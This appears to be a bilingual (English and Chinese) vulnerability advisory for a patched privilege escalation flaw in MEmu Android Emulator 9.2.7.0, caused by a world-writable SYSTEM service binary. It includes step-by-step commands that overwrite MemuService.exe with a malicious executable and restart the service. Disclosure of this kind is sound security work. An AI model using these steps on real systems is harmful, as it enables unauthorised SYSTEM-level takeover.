
CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2
CVE-2026-36213 | 通过不安全的服务二进制权限在 MEmu Android Emulator 9.2.7.0 中实现本地权限提升 | 已在 9.3.2 中修复
MEmu Android Emulator 9.2.7.0 中存在本地权限提升 (LPE) 漏洞。
服务 MEmuSVC 以 NT AUTHORITY\SYSTEM 权限运行,但其二进制文件可被任何本地用户写入,从而导致完全系统沦陷。
| 字段 | 详情 |
|---|---|
| CVE | CVE-2026-36213 |
| 产品 | MEmu Android Emulator (MicroVirt) |
| 受影响版本 | 9.2.7.0 及更早版本 |
| 修复版本 | 9.3.2 |
| CWE | CWE-732 / CWE-269 |
| CVSS v3.1 | 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ATT&CK | T1574.010 |
MEmuService.exe 被安装为 SYSTEM 级别的 Windows 服务,且具有不安全的 NTFS 权限:
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
BUILTIN\Users:(F) ← 任何本地用户拥有完全控制权
Everyone:(F) ← 全局可写二进制文件
:: 步骤1 - 检查易受攻击的权限
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
:: 步骤2 - 替换二进制文件(以低权限用户身份)
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
:: 步骤3 - 重启服务
sc stop MEmuSVC && sc start MEmuSVC
:: 结果:malicious.exe 以 NT AUTHORITY\SYSTEM 权限运行
可用地址:https://github.com/sec-zone/Hijack-service-binaries
本研究仅供教育目的,并遵循负责任披露政策。
作者不对任何滥用此信息的行为负责。
姓名:Mohammad Hossein Ashofte Yazdi
领英:https://www.linkedin.com/in/seczone64
推特:@sec_zone64
邮箱:[email protected]